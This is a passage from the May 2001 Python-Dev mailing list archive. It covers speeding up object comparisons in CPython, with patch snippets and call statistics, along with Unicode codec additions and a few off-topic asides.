with auto- conversion. 'ignore' and 'replace' allow silently ignoring the problem. > There's a theme here : I have no idea how important roundtrip is in > Unicode Practice, or even that it's a constant across apps and encodings. If > I write a codec to map all ASCII consonants to u"k" and vowels to u"a", I > wouldn't care that I can't get "love" back from u"kaka" . Round-tripping is obviously very important if you use Unicode as basis for working on text. I don't know about the reasoning behind making cp875 fail the round-trip -- Unicode certainly provides means to make mappings round-trip safe (e.g. by reverting to the private Unicode char. point areas). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Tue May 15 11:26:32 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 05:26:32 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > Is this really exactly what Python would guarantee? I'm surprised that > x==x would always be true, but x!=x might be true also. In a type where > x!=x holds, wouldn't people also want to say that x==x might fail? IOW, > I had expected that you'd reduced it to > > if (v == w && op == Py_EQ) /* then return Py_True */ > if (v == w && op == Py_NE) /* then return Py_False */ I agree that would be more analogous to what PyObject_Compare() does. I'm not sure either make sense for rich comparisons; for example, under IEEE-754 rules, a NaN must compare not-equal to everything, including itself(!), and richcmps are the only hope Python users have of modeling that. Doing those pointer checks before giving richcmps a chance would kill that hope. Can we agree to drop this one until somebody produces stats saying it's important? I have no reason to suspect that it is. > The one application where this may help is list_contains, in > particular when searching a list of interned strings. string_compare() could special-case pointer equality too, although I suspect doing so would be a net loss. > Please have a look at the patch below. I will, but not tonight anymore -- it's been a very long day. > ... > I agree "in principle" :-) However, you cannot move the case "equal > types, implementing tp_compare" before the case "one of them > implements tp_richcompare" without changing the semantics. Of course. But except for instance objects, answering "does the type implement tp_richcompare?" is one lousy pointer check, and the answer will usually be-- provided we don't start stuffing code into *every* object's tp_richcompare slot! --"no, so I can go to tp_compare immediately". Coercions and richcmps are the oddball cases today. > The change here is what you'd do when you have both richcmp and > oldcomp; Python clearly mandates using richcmp. Yes, except you don't usually have both today and reality is exploitable . > In case this is not obvious (it wasn't to me): UserList will complain > about using the deprecated __cmp__, Sounds like a bug to me; if cmp is deprecated, that's also news to me. > and dictionaries will iterate over their elements differently. dicts didn't have a tp_richcompare slot before I added it last week, and because dicts can do a much faster and more-general job on Py_EQ and Py_NE than dict cmp (but on nothing else). I originally took away the tp_compare slot for dicts and lived to regret it -- it has both now. > Given that richcomp has to be tried first, this patch does the "common > case" at the earliest possible time, and with no overhead, except for > PyErr_Occurred call. The earliest *reasonable* time would be after a short block of new pointer checks while still inside PyObject_RichCompare(): I believe the usual case today is that the objects are of the same type, the type doesn't have a tp_richcompare slot, but does have a tp_compare slot. This covers at least ints, floats, longs and strings, where the overhead of a single function call is most often larger than the time it actually takes to compare the darned things. It's not important to, e.g., get to a dict comparison quickly, because comparing dicts is darned expensive even after we find the dict comparison routine. Ditto comparing instances or matrices etc. Optimizing for richcmps is optimizing the less important thing. BTW, tuples have a richcompare slot today and it's unclear that's a good idea. They do the same kind of Py_EQ/Py_NE "length check" you like for strings, and I'd be surprised if that didn't cost more than it saves. Unlike strings, whenever I compare tuples they *always* have the same size (e.g., think of all the decorator pattern ways tuples are used to augment sorts). OK, across a full run of the test suite, tuplerichcompare() was called about 162000 times, all but about 50 times with Py_EQ or Py_NE. The number of times this code block at the start bore fruit: if (vt->ob_size != wt->ob_size && (op == Py_EQ || op == Py_NE)) { /* Shortcut: if the lengths differ, the tuples differ */ PyObject *res; if (op == Py_EQ) res = Py_False; else res = Py_True; Py_INCREF(res); return res; } was 0 -- the tuples were always the same size for Py_EQ/Py_NE, and the code just burned cycles. I want to move toward optimizations that save more than they cost <0.7 wink>. > ... > For strings, I would still special-case tp_richcompare: when tracing > calls to string_richcompare, I found that most calls with Py_EQ can > be decided by checking that the string lengths are not equal. I expect you'd also find that the current string_compare() usually decides they're not equal on the first character comparison (which *it* special-cases). So special-casing on length isn't a clear win over what's already done. But, if it is, bravo! Special-case the snot out of it without calling *any* string functions (merely calling string_richcompare likely costs a good deal more than comparing the lengths). more-measuring-less-guessing-ly y'rs - tim From thomas at xs4all.net Tue May 15 13:51:06 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 15 May 2001 13:51:06 +0200 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: <200105150426.f4F4QVx01531@localhost.local>; from uche.ogbuji@fourthought.com on Mon, May 14, 2001 at 10:26:31PM -0600 References: <200105150426.f4F4QVx01531@localhost.local> Message-ID: <20010515135106.A16811@xs4all.nl> On Mon, May 14, 2001 at 10:26:31PM -0600, Uche Ogbuji wrote: > I thought I was th only one getting all these silly Nigerian scam spams. I > figured maybe they saw my name and decided to test on me (though they might > more cleverly have figured that a fellow Nigerian would be wise to the game). Actually, one of my colleagues informed me that this spam is in fact *very old* (after I ROTFL'd rather loudly reading the Dilbert comic featuring the Nigerian spam a mere week after getting the spam myself :) Scott (my colleague, not Adams) remembers first getting it by fax, 15 years ago, and again several years later. And not just one fax, but every single fax in the company, and lots more outside of the company. Apparently the telephone operator issued a warning to all customers not to respond to the fax. Still-sound-advice-ly y'rs, -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Tue May 15 14:10:16 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Tue, 15 May 2001 14:10:16 +0200 Subject: [Python-Dev] Easy codec access Message-ID: <3B011CA8.9DDB4FC7@lemburg.com> I've just checked in a set of patches which implement the new .decode() method along with a couple of useful codecs. You can now do things like these: >>> "abc".encode('zlib').encode('base64') 'eJxLTEoGAAJNASc=\n' >>> _.decode('base64').decode('zlib') 'abc' >>> "abc???".decode('latin-1') u'abc\xe4\xf6\xfc' >>> "abc???".decode('latin-1').encode('latin-1') 'abc\xe4\xf6\xfc' >>> "Hello World !".encode('rot13') 'Uryyb Jbeyq !' So the overall codec experience should be a much better one now. To see just how easy it is to write codecs, please have a look at the string codecs I added in this patch (e.g. zlib_codec.py or hex_codec.py). I am pretty sure that there are a lot more useful things in the standard lib which could benefit from these easy-to-use interfaces. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at pythonware.com Tue May 15 14:11:26 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Tue, 15 May 2001 14:11:26 +0200 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 References: <200105150426.f4F4QVx01531@localhost.local> <20010515135106.A16811@xs4all.nl> Message-ID: <005701c0dd38$2f417560$0900a8c0@spiff> thomas wrote: > Actually, one of my colleagues informed me that this spam is in fact > *very old* more info here: http://home.rica.net/alphae/419coal/index.htm "A Five Billion US$ (as of 1996, much more now) worldwide Scam which has run since the early 1980's under Successive Governments of Nigeria. "The Nigerian Scam is, according to published reports, the Third to Fifth largest industry in Nigeria." Cheers /F (highest offer this far: $155,000,000) From guido at digicool.com Tue May 15 17:27:31 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 10:27:31 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Tue, 15 May 2001 05:26:32 -0400." References: Message-ID: <200105151527.KAA28734@cj20424-a.reston1.va.home.com> > [Martin v. Loewis] > > Is this really exactly what Python would guarantee? I'm surprised that > > x==x would always be true, but x!=x might be true also. In a type where > > x!=x holds, wouldn't people also want to say that x==x might fail? IOW, > > I had expected that you'd reduced it to > > > > if (v == w && op == Py_EQ) /* then return Py_True */ > > if (v == w && op == Py_NE) /* then return Py_False */ [Tim] > I agree that would be more analogous to what PyObject_Compare() does. > > I'm not sure either make sense for rich comparisons; for example, under > IEEE-754 rules, a NaN must compare not-equal to everything, including > itself(!), and richcmps are the only hope Python users have of modeling that. > Doing those pointer checks before giving richcmps a chance would kill that > hope. Can we agree to drop this one until somebody produces stats saying > it's important? I have no reason to suspect that it is. PEP 207 is quite explicit that == and != are not to be assumed each other's complement. It is silent on the x==x issue but the PEP mentions IEEE 754 so I agree that this also shouldn't be cut short. --Guido van Rossum (home page: http://www.python.org/~guido/) From fdrake at acm.org Tue May 15 17:29:10 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Tue, 15 May 2001 11:29:10 -0400 (EDT) Subject: [Python-Dev] Unicode docs In-Reply-To: References: <3AFFA23F.248517E3@lemburg.com> Message-ID: <15105.19270.62890.240534@cj42289-a.reston1.va.home.com> Tim Peters writes: > The latter addresses several *fundamental* questions untouched by > the former, like whar are the datatypes of the arguments and the > result, what values does errors accept, and what do they mean? The > first blurb answers some more, like what's the default encoding, > and which exception is raised? Neither is complete on its own, but > the reference manual should have a complete answer to all such > questions. It doesn't have to go on at great length. I've beefed up the desciption of the unicode() function by merging the information from AMK's document. > A round-trip example would be invaluable. > > If Fred wanted to incorporate a brief overview too, a light rework of > Andrew/Moshe's writeup would be an excellent start. I'd love to have a contribution from someone with more knowledge of what's there than me. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From guido at digicool.com Tue May 15 18:35:09 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 11:35:09 -0500 Subject: [Python-Dev] Easy codec access In-Reply-To: Your message of "Tue, 15 May 2001 14:10:16 +0200." <3B011CA8.9DDB4FC7@lemburg.com> References: <3B011CA8.9DDB4FC7@lemburg.com> Message-ID: <200105151635.LAA29530@cj20424-a.reston1.va.home.com> > I've just checked in a set of patches which implement the new > .decode() method along with a couple of useful codecs. Cool! > To see just how easy it is to write codecs, please have > a look at the string codecs I added in this patch (e.g. > zlib_codec.py or hex_codec.py). I am pretty sure that there > are a lot more useful things in the standard lib which could > benefit from these easy-to-use interfaces. As an excercise, I added a quoted-printable codec. It was easy indeed! --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik at effbot.org Tue May 15 20:21:00 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Tue, 15 May 2001 20:21:00 +0200 Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online Message-ID: <000901c0dd6b$cdb5d960$e46940d5@hagrid> in case anyone has two hours to spare, and the right software, MIT's dynamic languages group has posted a quicktime video of their recent panel on language design. http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html (what 1/2 should result in, why it's good to have both CPython and JPython, why whitespace is significant, why language design is perhaps more related to architecture than math, and lots of other goodies from Guy Steele and others) Cheers /F From nas at python.ca Tue May 15 20:51:20 2001 From: nas at python.ca (Neil Schemenauer) Date: Tue, 15 May 2001 11:51:20 -0700 Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online In-Reply-To: <000901c0dd6b$cdb5d960$e46940d5@hagrid>; from fredrik@effbot.org on Tue, May 15, 2001 at 08:21:00PM +0200 References: <000901c0dd6b$cdb5d960$e46940d5@hagrid> Message-ID: <20010515115120.A14357@glacier.fnational.com> Fredrik Lundh wrote: > in case anyone has two hours to spare, and the right software, > MIT's dynamic languages group has posted a quicktime video of > their recent panel on language design. > > http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html Does the streaming actually work for anyone? I've given up and started download the whole .mov files. Neil From martin at loewis.home.cs.tu-berlin.de Tue May 15 21:45:59 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 21:45:59 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de> > more-measuring-less-guessing-ly y'rs - tim Producing numbers is easy :-) I've instrumented my version where string implements richcmp, and special-cases everything I can think of. Counting is done for running the test suite. With this, I get Calls to string_richcompare: 2378660 Calls with different types: 33992 (ie. one is not a string) Calls with identical strings: 120517 Calls where lens decide !EQ: 1775716 ---------------------------- Calls richcmp -> oldcomp: 448435 Total calls to oldcomp: 1225643 Calls oldcomp -> memcmp: 860174 So 5% of the calls are with identical strings, for which I can immediately decide the outcome. 75% can be decided in terms of the string lengths, which leaves ca. 19% for cases where lexicographical comparison is needed. In those cases, the first byte decides in 30%. If I remove the test for "len decides !EQ", I get #riches: 2358322 #riches_ni: 34108 #idents_decide: 102050 #lens_decide: 0 -------------------------------------- rest(computed): 2222164 #comps: 2949421 #memcmps: 917776 So still, ca. 30% can be decided by first byte. It still appears that the total number of calls to memcmp is higher when the length is not taken into consideration. To verify this claim, I've counted the cases where the length decides the outcome, but looking at the first byte also had: lens_decide: 1784897 lens_decide_firstbyte_wouldhave:1671148 So in 6% of the cases, checking the length alone gives a decision which looking at the first byte doesn't; plus it saves a function call. To support the thesis that Py_EQ is the common case for strings, I counted the various operations: pyEQ:2271593 pyLE:9234 pyGE:0 pyNE:20470 pyLT:22765 pyGT:578 Now, that might be flawed since comparing strings for equal is extremely frequent in the testsuite. To give more credibility to the data, I also ran setup.py with my instrumented ./python: riches:21640 riches_ni:76 riches_ni1:0 idents:2885 idents_decide:2885 lens_decide:9472 lens_decide_firstbyte_wouldhave:6223 comps:26360 memcmps:19224 pyEQ:20093 pyLE:46 pyGE:1 pyNE:548 pyLT:876 pyGT:0 That shows that optimizing for Py_NE is not worth it. With these data, I'll upload a patch to SF. Regards, Martin From tim at digicool.com Tue May 15 22:22:37 2001 From: tim at digicool.com (Tim Peters) Date: Tue, 15 May 2001 16:22:37 -0400 Subject: [Python-Dev] Comparison corner case Message-ID: Here from the tail end of a patch comment. If you believe the illustrated behavior is wrong, then I don't believe we gain anything from using the tp_richcmp slot for tuples for anything other than EQ/NE testing (the gain for the latter is that it allows EQ/NE tuple comparison to work correctly on tuples containing elements that support only EQ/NE comparisons): """ BUG ALERT: The tuple (and list) richcmp algorithm is arguably wrong, because it won't believe there's any difference unless Py_EQ returns false for some corresponding elements: >>> class C: ... def __lt__(x, y): return 1 ... __eq__ = __lt__ ... >>> C() < C() 1 >>> (C(),) < (C(),) 0 >>> That doesn't make sense -- provided you believe the defn. of C makes sense. """ From guido at digicool.com Tue May 15 23:36:57 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 16:36:57 -0500 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: Your message of "Tue, 15 May 2001 13:13:01 MST." References: Message-ID: <200105152136.QAA00489@cj20424-a.reston1.va.home.com> Tim wrote: > BUG ALERT: The tuple (and list) richcmp algorithm is arguably wrong, > because it won't believe there's any difference unless Py_EQ returns false > for some corresponding elements: > > >>> class C: > ... def __lt__(x, y): return 1 > ... __eq__ = __lt__ > ... > >>> C() < C() > 1 > >>> (C(),) < (C(),) > 0 > >>> > > That doesn't make sense -- provided you believe the defn. of C makes sense. I think in this example the problem is with C, not with the tuple algorithm. The question is, what are you going to do otherwise? You could test for < first, == second -- but that means twice as many comparisons, and for reasonably-behaved items it makes no difference at all. --Guido van Rossum (home page: http://www.python.org/~guido/) From martin at loewis.home.cs.tu-berlin.de Tue May 15 22:59:56 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 22:59:56 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> > Of course. But except for instance objects, answering "does the type > implement tp_richcompare?" is one lousy pointer check Almost - you also have to check the type flag. > and the answer will usually be-- provided we don't start stuffing > code into *every* object's tp_richcompare slot! --"no, so I can go > to tp_compare immediately". Coercions and richcmps are the oddball > cases today. I'd like to add another data point, answering the question what types are most frequently compared. The first set of data is for running the Python testsuite. riches 3040952 # Calls to PyType_RichCompare eqs 2828345 # Calls where the types are equal String 2323122 Float 141507 Int 125187 Type 99477 Tuple 84503 Long 30325 Unicode 10782 Instance 9335 List 2997 None 383 Class 318 Complex 219 Dict 57 Array 49 WeakRef 34 Function 11 File 11 SRE_Pattern 10 CFunction 9 Lock 8 Module 1 So strings cover 82% of all the compare calls of equally-typed objects, followed by floats with 5%. Those calls together cover 93% of the richcompare calls. Since this might give a blurred view of what is actually used in applications, I ran the PyXML testsuite with that python binary also. Leaving out types that are not used, I get riches 88465 eqs 59279 String 48097 Int 5681 Type 3170 Tuple 760 List 492 Float 332 Instance 269 Unicode 243 None 225 SRE_Pattern 4 Long 3 Complex 3 The first observation here is that "only" 67% of the calls are with equally-typed objects. Of those, 80% are with strings, 9% with integers. The last example is idle, where I just did an "import httplib", for fun. riches 50923 eqs 49882 String 31198 Tuple 8312 Type 7978 Int 1456 None 600 SRE_Pattern 210 List 122 Instance 4 Float 1 Instance method 1 Roughly the same picture: 97% calls with equally-typed objects, of those 62% strings, 3% integers. Notice the 15% for tuples and types, each. So to speed-up the common case clearly means to speed-up string comparisons. If I'd need to optimize anything else afterwards, I'd look into type objects - most likely, they are compared for EQ, which can be done nicely and directly in a tp_richcompare also. Those two optimizations together would give a richcompare to 95% of the objects in the IDLE case. Regards, Martin From guido at digicool.com Wed May 16 00:41:12 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 17:41:12 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Tue, 15 May 2001 22:59:56 +0200." <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> Message-ID: <200105152241.RAA00926@cj20424-a.reston1.va.home.com> I'm curious where the frequent comparisons of types come from. Is there lots of code that does frequent assert type(x) == T typechecking? Does isinstance(x, T) perhaps use EQ? --Guido van Rossum (home page: http://www.python.org/~guido/) From barry at digicool.com Tue May 15 23:51:00 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Tue, 15 May 2001 17:51:00 -0400 Subject: [Python-Dev] Comparison speed References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> Message-ID: <15105.42180.401918.223487@anthem.wooz.org> >>>>> "GvR" == Guido van Rossum writes: GvR> I'm curious where the frequent comparisons of types come GvR> from. GvR> Is there lots of code that does frequent GvR> assert type(x) == T GvR> typechecking? GvR> Does isinstance(x, T) perhaps use EQ? Not to mention the several hundred comparisons to None. From jeremy at digicool.com Tue May 15 19:26:54 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Tue, 15 May 2001 13:26:54 -0400 (EDT) Subject: [Python-Dev] Comparison speed In-Reply-To: <200105152241.RAA00926@cj20424-a.reston1.va.home.com> References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> Message-ID: <15105.26334.610144.846269@slothrop.digicool.com> I only learned recently that isinstance() can be called with types instead of classes. I suppose the name lead me in the wrong direction. I had the silly idea that it only applied to instances <0.1 wink>. So it comes as little surprise to me that there is a lot of code executed in, e.g., the test suite that does comparisons on types. In the Lib directory, there are 63 files that use == and the builtin type function. (Simple grep.) A total of 139 instances of this idiom. A cursory scan suggests that most of the call are things like type(obj) == type(''). In the Zope source tree, there are 58 files and 98 individual occurrences. It again looks like comparisons against string type is the most common. I can think of two common cases where an object is checked against the string type. One is an interface that takes a file-like object or its path. The other is an interface that takes a sequence, but doesn't want to try a string as a sequence. Sounds like we ought to do a search-and-destroy on type comparisons, replacing with isinstance() where possible. Jeremy From jeremy at digicool.com Tue May 15 19:41:58 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Tue, 15 May 2001 13:41:58 -0400 (EDT) Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online In-Reply-To: <20010515115120.A14357@glacier.fnational.com> References: <000901c0dd6b$cdb5d960$e46940d5@hagrid> <20010515115120.A14357@glacier.fnational.com> Message-ID: <15105.27238.582785.851371@slothrop.digicool.com> I download one of the files, but the quicktime player I have on my Windows box said it didn't understand the file format. I eventually got the streaming version at the 100kbps to "work" where work meant mostly an audio feed and occasional stills that were recognizable. Jeremy PS It was cool to watch the one on compilation. Mat Hostetter, one of the panelists, is my old roommate! From barry at digicool.com Wed May 16 00:56:10 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Tue, 15 May 2001 18:56:10 -0400 Subject: [Python-Dev] Comparison speed References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> Message-ID: <15105.46090.203278.397835@anthem.wooz.org> >>>>> "JH" == Jeremy Hylton writes: JH> I only learned recently that isinstance() can be called with JH> types instead of classes. I suppose the name lead me in the JH> wrong direction. I had the silly idea that it only applied to JH> instances <0.1 wink>. JH> So it comes as little surprise to me that there is a lot of JH> code executed in, e.g., the test suite that does comparisons JH> on types. JH> In the Lib directory, there are 63 files that use == and the JH> builtin type function. (Simple grep.) A total of 139 JH> instances of this idiom. A cursory scan suggests that most of JH> the call are things like type(obj) == type(''). Even without the forward-looking insight that types are classes , I think type comparisions should have been done with `is' and not ==. So old school type comparisons should have been done as type(obj) is StringType whereas new school type comparisons should be done as isinstance(obj, StringType) With Python 2.1 == is naturally, slower than `is', but isinstance() comes in somewhere in the middle. 563897.802881 is comparisons per second 506827.201066 == comparisons per second 520696.916088 isinstance() comparisons per second -Barry -------------------- snip snip -------------------- from types import StringType import time r = range(1000000) def one(r=r): x = 'hello' t0 = time.time() for i in r: type(x) is StringType t1 = time.time() - t0 print len(r) / t1, 'is comparisons per second' def two(r=r): x = 'hello' t0 = time.time() for i in r: type(x) == StringType t1 = time.time() - t0 print len(r) / t1, '== comparisons per second' def three(r=r): x = 'hello' t0 = time.time() for i in r: isinstance(x, StringType) t1 = time.time() - t0 print len(r) / t1, 'isinstance() comparisons per second' one() two() three() From tim.one at home.com Wed May 16 01:49:03 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 19:49:03 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de> Message-ID: Making the 5am email concrete, this is what I meant: Index: object.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v retrieving revision 2.131 diff -c -r2.131 object.c *** object.c 2001/05/11 03:36:45 2.131 --- object.c 2001/05/15 23:39:24 *************** *** 835,841 **** } } else { ! res = do_richcmp(v, w, op); } compare_nesting--; return res; --- 835,863 ---- } } else { ! cmpfunc f; ! if (v->ob_type == w->ob_type ! && RICHCOMPARE(v->ob_type) == NULL ! && (f = v->ob_type->tp_compare) != NULL) ! { ! int c = (*f)(v, w); ! if (c < 0 && PyErr_Occurred()) ! res = NULL; ! else { ! switch (op) { ! case Py_LT: c = c < 0; break; ! case Py_LE: c = c <= 0; break; ! case Py_EQ: c = c == 0; break; ! case Py_NE: c = c != 0; break; ! case Py_GT: c = c > 0; break; ! case Py_GE: c = c >= 0; break; ! } ! res = c ? Py_True : Py_False; ! Py_INCREF(res); ! } ! } ! else ! res = do_richcmp(v, w, op); } compare_nesting--; return res; That's a local change to PyObject_RichCompare, taking a fast path for most scalar types (which don't have richcmps but do have tp_compare today). On my Win98 box reproducible timings are impossible, but it obviously chops out layers and layers of function calls and redundant tests when it triggers. That appears to be more often than not across all apps I've tried, from 60% of PyObject_RichCompare calls to nearly 100%. From tim.one at home.com Wed May 16 02:01:05 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 20:01:05 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: <200105152136.QAA00489@cj20424-a.reston1.va.home.com> Message-ID: [Tim] > BUG ALERT: The tuple (and list) richcmp algorithm is arguably wrong, > because it won't believe there's any difference unless Py_EQ > returns false for some corresponding elements: > > >>> class C: > ... def __lt__(x, y): return 1 > ... __eq__ = __lt__ > ... > >>> C() < C() > 1 > >>> (C(),) < (C(),) > 0 > >>> > > That doesn't make sense -- provided you believe the defn. of C > makes sense. [Guido] > I think in this example the problem is with C, not with the tuple > algorithm. I can live with that. > The question is, what are you going to do otherwise? You > could test for < first, == second -- but that means twice as many > comparisons, and for reasonably-behaved items it makes no difference > at all. The question remaining is how much of this list/tuple richcmp behavior is guaranteed by the language and how much is just implementation-dependent fuzz. For a more vanilla example, I removed the EQ/NE "lengths differ?" tuple richcmp early-exit test because I never found code that made it trigger. (but tons of code that gets there without triggering). But this has semantic implications too: an implementation without the early exit may call user-defined comparison routines that raise exceptions when comparing tuples of different lengths now. Do you care? (I don't.) From tim.one at home.com Wed May 16 02:37:56 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 20:37:56 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > I'd like to add another data point, answering the question what types > are most frequently compared. That varies wildly by app. I have apps where int compares *overwhelmingly* dominate, others where float compares do, many where strings compares do, and the last code I wrote for Zope spends most of its (very substantial) time doing lookups of "object ids" in dicts. In Python terms, those are Pythong lon (unbounded) ints today, and potentially Python ints on 64-bit boxes, and that's another case where ceval.c's special-casing of int compares is impotent. Heck, sort a large homogeneous array once, and whatever element type that array has will likely dominate comparisons for the whole app! That's why I'm so keen to chop out a half dozen layers of blubber for *all* types that don't play the richcmp game (which today includes every type I mentioned above). > The first set of data is for running the Python testsuite. > > riches 3040952 # Calls to PyType_RichCompare > eqs 2828345 # Calls where the types are equal > > String 2323122 > Float 141507 > Int 125187 > Type 99477 > Tuple 84503 > Long 30325 > Unicode 10782 > Instance 9335 > List 2997 > None 383 > Class 318 > Complex 219 > Dict 57 > Array 49 > WeakRef 34 > Function 11 > File 11 > SRE_Pattern 10 > CFunction 9 > Lock 8 > Module 1 > > So strings cover 82% of all the compare calls of equally-typed > objects, followed by floats with 5%. Those calls together cover 93% of > the richcompare calls. > > Since this might give a blurred view of what is actually used in > applications, Note that the top 4 types don't have a tp_richcompare slot today. The tuples are likely composed of simple scalar types, and the latter benefit too. But as above, we can't say anything in advance about the *specific* types a given app is going to compare most often. There is no "typical app" in that respect. > I ran the PyXML testsuite with that python binary > also. Leaving out types that are not used, I get > > riches 88465 > eqs 59279 > > String 48097 > Int 5681 > Type 3170 > Tuple 760 > List 492 > Float 332 > Instance 269 > Unicode 243 > None 225 > SRE_Pattern 4 > Long 3 > Complex 3 > > The first observation here is that "only" 67% of the calls are with > equally-typed objects. Someone who cares about the speed of PyXML would be well advised to figure out why <0.9 wink>: there's no scheme on the horizon that will speed mixed-type comparisons one whit. > Of those, 80% are with strings, 9% with integers. XML is a string-crunching app, right? > The last example is idle, where I just did an "import httplib", for > fun. > > riches 50923 > eqs 49882 > > String 31198 > Tuple 8312 > Type 7978 > Int 1456 > None 600 > SRE_Pattern 210 > List 122 > Instance 4 > Float 1 > Instance method 1 > > Roughly the same picture: 97% calls with equally-typed objects, of > those 62% strings, 3% integers. Notice the 15% for tuples and types, > each. Surprising! > So to speed-up the common case clearly means to speed-up string > comparisons. The only thing the apps I've tried have in common is that the types compared most often do have tp_compare but not tp_richcompare functions. The test suite, XML and IDLE are all heavy string-slingers. > If I'd need to optimize anything else afterwards, I'd look into type > objects - most likely, they are compared for EQ, which can be done > nicely and directly in a tp_richcompare also. Would do just as well to give them a one-liner tp_compare function (in conjunction with the posted patch). > Those two optimizations together would give a richcompare to 95% of > the objects in the IDLE case. Since that's the exact opposite of what I want to do, it's at least interesting . Whatever, there needs to be a (very) fast path, and it needs to pick on something that all common types implement, including at least strings, ints, longs, floats and-- I guess --type objects. I don't know about other people, but I have lots of code that uses the cmp() function heavily. That path has also gotten bloated, and tries each of Py_EQ, Py_LT and Py_GT in turn now, hoping for *one* of them to say "yes". It does this now even if the tp_compare slot is defined. The only thing that's saving cmp()-slinging code from major sloth now is that the basic types do *not* implement tp_richcompare, so try_rich_to_3way_compare gets out early (before doing the three-way Py_EQ etc dance). But give the basic scalar types richcmp functions, and cmp() will slow down a lot (unless more hacks are added to stop that). From greg at cosc.canterbury.ac.nz Wed May 16 03:58:05 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Wed, 16 May 2001 13:58:05 +1200 (NZST) Subject: [Python-Dev] Comparison speed In-Reply-To: Message-ID: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz> Tim Peters : > In Python terms, those are Pythong lon (unbounded) ints today ^^^^^^^ What Pythonistas wear on their feet? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From esr at thyrsus.com Wed May 16 04:27:38 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Tue, 15 May 2001 22:27:38 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Wed, May 16, 2001 at 01:58:05PM +1200 References: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz> Message-ID: <20010515222738.A9996@thyrsus.com> Greg Ewing : > Tim Peters : > > > In Python terms, those are Pythong lon (unbounded) ints today > ^^^^^^^ > What Pythonistas wear on their feet? No, man. It's what sexy lady Pythonistas wear on the beach in Rio. (Yes, I know some sexy lady Pythonistas. No, you can't have their phone numbers. Pthfthfthpht...) -- Eric S. Raymond Question with boldness even the existence of a God; because, if there be one, he must more approve the homage of reason, than that of blindfolded fear.... Do not be frightened from this inquiry from any fear of its consequences. If it ends in the belief that there is no God, you will find incitements to virtue in the comfort and pleasantness you feel in its exercise... -- Thomas Jefferson, in a 1787 letter to his nephew From tim.one at home.com Wed May 16 09:14:25 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 03:14:25 -0400 